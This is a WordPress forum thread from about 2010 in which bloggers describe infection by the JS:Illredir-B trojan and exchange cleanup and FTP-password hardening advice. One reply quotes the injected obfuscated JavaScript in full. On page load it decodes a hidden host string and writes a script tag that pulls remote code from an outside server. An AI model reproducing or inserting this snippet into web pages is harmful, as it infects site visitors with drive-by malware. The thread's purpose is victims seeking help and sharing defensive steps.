JS:Illredir-B [Trj] Trojan — Posts and edits infected

colvin
(@colvin)

14 years, 3 months ago

A new malware has been creating huge problems for many WP bloggers over the past week. Avast anti-virus is detecting a Trojan when I and others attempt to create a new post or page, or even to edit a post or page. Avast identifies the culprit as JS:Illredir-B [Trj]. Does anyone know how to get rid of this — it seems to be imbedded within the WP code. I cannot post anything now.

The malware has also created problems in other areas of WordPress, including a number of plug-ins that utilize java script, as well as the entire wp-includes/js folder. These latter problems in some cases corrupt the blog, with error messages coming up, rather than the blog itself. I’ve managed, with the help of Hostgator and my server admin, to resolve these problems via cPanel, deleting everything that Avast identifies. My blog is once again visible, but I cannot post to it.

The culprit behind these problems appears to be a malware siszyd32.exe, which is secretly downloaded onto computers that visit infected blogs. Once in one’s computer, it then seeks out one’s blogs and inserts bad things there.

Viewing 14 replies - 1 through 14 (of 14 total)

layabozi
(@layabozi)

14 years, 3 months ago

I got this virus on my website. i had many problems, and last week i’ve been down, trying to learn how to do the cleaning and fix all the mess.
yesterday i found this forum where they talked about the virus (here: http://www.wjunction.com/showthread.php?t=21715 ) and they mentioned there a solution. an script to download an install on the server.
i tried to get it but i couldn’t. i posted asking options of urls, or other ways to get rid of it.
i’m too scared to reinstall everything. so what i’m doing is downloading folder by folder in my root directory. when downloading my antivirus (avast, al my life!) pops when detecting an infected file (so i take note of the file then).
As they say on this forum, the virus attacked almost all.js files. So I’m thinking once i finish the cleaning (checking the files during the download, then scanning again those downloaded, then delete the infected files on the server, then do all over again, until there are no more pop ups) …once finished that i will re install wordpress, and the plugins, the files that were infected. and i’l try to keep those that are fine. because most of my plugins are specially custumized for my website, so it is a big big terrible work to reinstall everything from zero.
also.. i’m hoping only the wordpress folder is infected, because my server provider said that if the other folders in the root directory, set there by the provider, if those are infected then it will be necessary to reset the whole server. i’m crossing fingers, lightning candles, doing spells, praying to all gods, … i don’t even want to write it…. the cleaning has to work out fine and be enough…

have you find solutions more professionals and effectives?

Thread Starter colvin
(@colvin)

14 years, 3 months ago

My blog administrator and I worked all yesterday cleaning out WP on my server. We had to delete a lot of plug-ins and the entire /js folder. Then I upgraded automatically from WP 2.7 to WP 2.9.1. Avast seemed satisfied, and the blog appeared on screen as it should [missing a couple of plug-ins].

BUT we have not yet found a way to repair the WP posting facility. Any time I try to post something, Avast identifies this Trojan.

Hostgator has been helpful, but the malware seems to be widespread there. And presumably it will not repair individual installations of WP.

Hope to get a final solution today.

Thread Starter colvin
(@colvin)

14 years, 3 months ago

Re-alerting community to new virus attacking WP.

layabozi
(@layabozi)

14 years, 3 months ago

in this website they are talking about it. and they link to a script that cleans the files.
here: http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/

i am just too afraid to execute this script wihtout any knowledge. i’m not a pro, as i said, and there are no clear instructions. anyone here who could help me with instructions for dummies to do this??

Thread Starter colvin
(@colvin)

14 years, 3 months ago

The moderator of this WP Forum said that he has referred this problem to the WP Security Team. Hopefully, we will hear an official opinion and fix from them. They will probably reply to this thread — so keep checking it.

Thread Starter colvin
(@colvin)

14 years, 3 months ago

The malware has gotten into my WP-admin post functions. Avast suggest that any new posts will carry the virus and potentially infect my readers.

A work-around is to do my posts using the ScribeFire extension for Firefox.

layabozi
(@layabozi)

14 years, 3 months ago

Colvin I understood how to use the script they give in zyenweb.com to clean the virus. just upoad it to your rood directory, or public_html folder. then go to yourdomain.com/thenameofthescript.php and go for it
there are the instructions.
it worked! cleaned everything. the website is safe. also i followed the instructions on the other forum i mentioned before. change the password for ftp, and i’m not keeping stored on filezilla.
use the script, it will take the virus out.

good luck!

omsah
(@omsah)

14 years, 3 months ago

I am writing this to add to the information pool. 3 Jan 10, I upgraded my WP to 2.9, tried to make a post but couldn’t. When I rebooted my computer WP seemed to work fine.

(At sometime during this timeline I also upgraded to WP 2.9.1.)

4 Jan 10 I published a post. 5 Jan 10 I tweeted my post and was notified by one of my twitter friends as follows:

Avast ( anti-virus software) tells me your page contains a Trojan Horse – JS:Illredir-B [Trj] – check for malicious code injected by hacker

I found the page:
http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/

used the script and cleaned my Public html directory of the code.

And in addition I have been using Filezilla for my ftp. I have changed my password and no longer use the quick connect feature.

At this point I am more curious about how I can protect my site from invasions like this in the future.

How is it that people seem to think that the ftp is the way this is spread? Any other hints at securing my blog site?

Thanks!

Janine

Clayton James
(@claytonjames)

14 years, 3 months ago

How is it that people seem to think that the ftp is the way this is spread?

I read a little bit about this issue a few days ago. It was my impression that the most likely cause of infection might be that a trojan may actually start its cycle on an infected computer where the ftp client resides. That trojan then attempts to harvest your ftp credentials from your infected pc. If successful, it’s only logical to conclude that your password information for your ftp account is then used to gain access to your web site and compromise your files. I would imagine that once someone with compromised credentials has infected their own site in a shared hosting environment, that it would be reasonable to expect that a trojan/malicious script might be capable of looking for ways to exploit vulnerabilities on a shared server once it’s there. That’s just my impression from what I have read, but it seems to make sense.

At this point I am more curious about how I can protect my site from invasions like this in the future.

You might find some helpful tips in the links in these articles.

FAQ My site was hacked

Hardening WordPress

Thread Starter colvin
(@colvin)

14 years, 3 months ago

I’m fairly certain that Clayton is correct. My computer was first infected with siszyd32.exe, which somehow got into my computer [probably a “drive-by virus” picked up from a WP blog. I learned about the infection right away, I think, because WinPatrol reported this malware was trying to get into my start up folder.

WinPatrol won’t clean out this infection. Fastfixer also can detect it –and it claims to completely delete it. I’m not sure that it does a complete removal. I ended up reformatting.

Thanks re more info regarding the script that will clean the WP installation. I’ll work with my site admin to see how that works.

omsah
(@omsah)

14 years, 3 months ago

Thanks. I appreciate your time and effort. Janine

leparachute
(@leparachute)

14 years, 3 months ago

Hi,

After getting Illredir-B, C and E version, I got yesterday (or this morning) a new version without GNU GPL in comment (so fixing scripts will not works). I’m really bored with these trojan, I would want to do something else than fixing my site.

Is there anything to do ? Is there a WP correction/plugin to avoid these injections ? I read the thread but I didn’t seen talking about patch ?

Below the new code (I removed voluntarily <script> tags) injected :

try{window.onload=function(){document.write(‘<div id=megaid>qq-com.dion.ne.jp.pch-com</div>’);Ii0eyw8oi3 = document.getElementById(‘megaid’).innerHTML + ‘.(c^&o!@!u^!#n!@#t^e$(r!b^#(e!#&s@(t).@$$r(@u#@!:!&D#$^@E$^)^B)!U@G#(@/($@w)#(i!&k^t&^i@#)#@o#((n^&a)#@r#((&y&#.@&$^o)r@g#&@/&@^w@^!(#i&k$()t@&i(^$o&n)#$$a@#(&r!!y&$&).##^^o!!@#r)g()))/@&@s($$#w!e!&@e(!t!$i((m@).!&(c!@o&)^!m^#/&^$!)n(()h(l&.@$(c^@^o(@m@@/@)#@g$)$^o$(o(^@g)l$(e)!)#@.)c(!&o!(m@)&/(@)()’.replace(/$|#|\^|$|\!|&|\$|@/ig, ”) ;document.write(‘<scr’+’ipt src=http://’+Ii0eyw8oi3.replace(/DEBUG/g, ‘8080’)+’></scr’+’ipt>’);} } catch(Bthunpx ) {}
<!–d7b14b298829f3e9702802f1f266991b–>

Thanks in advance for help.
Best regards, Leparachute.

moewriter
(@moewriter)

14 years, 2 months ago

Is there anything new on this – I just found out that I have the virus. Not sure where to start or how to upload WP 2.9.1 I haven’t updated my word press since I started.

Samuel B
(@samboll)

14 years, 2 months ago

you folks have to completely clean your blog and computer

http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

http://codex.wordpress.org/FAQ_My_site_was_hacked

after
http://codex.wordpress.org/Hardening_WordPress

you can download 2.9.1 by clicking the “Download” link at top right of this page